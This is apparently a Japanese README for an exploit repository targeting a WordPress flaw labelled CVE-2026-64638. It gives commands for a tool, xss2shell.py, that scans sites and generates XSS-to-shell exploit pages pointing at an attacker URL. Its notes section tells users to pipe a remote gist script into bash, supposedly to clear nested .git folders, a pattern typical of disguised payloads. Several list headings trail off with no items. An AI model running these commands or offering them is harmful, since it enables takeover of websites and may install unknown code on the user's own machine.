
CVE-2026-64638 - 下書きまたはTODO
PayPalまたは下のQRコードをスキャンして、このプロジェクトのメンテナンスを支援してください。
このプロジェクトは、次のような安全かつ許可された環境でのみ使用してください:
セットアップ例:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
使用例:
# 1. Scanning Mode - Detect Vulnerable WordPress Sites:
# Scan a single URL
python xss2shell.py scan http://wp-vm.local
# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt
# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json
# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local
# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/
# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator
注記:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y を実行して、ネストされた .git ディレクトリをクリアする必要があります。管理された環境でサイバーセキュリティの概念を学び、テストし、研究するためのリポジトリです。
このリポジトリは、教育および許可されたセキュリティ研究のみを目的としています。
ユーザーが次のことについて学ぶのに役立つように設計されています:
このリポジトリは、次のような許可のある環境でのみ使用してください:
無許可または違法な使用は固く禁止されています。
著者および貢献者は、このプロジェクトによって引き起こされた損害、誤用、法的問題、または損失について責任を負いません。
このリポジトリを使用することにより、以下に同意したものとみなされます:
このプロジェクトは次の目的を意図しています:
責任ある情報開示の慣行に従い、適用されるすべての法律を遵守してください。
責任ある情報開示やコラボレーションについては、GitHubを通じてリポジトリのメンテナーに連絡してください。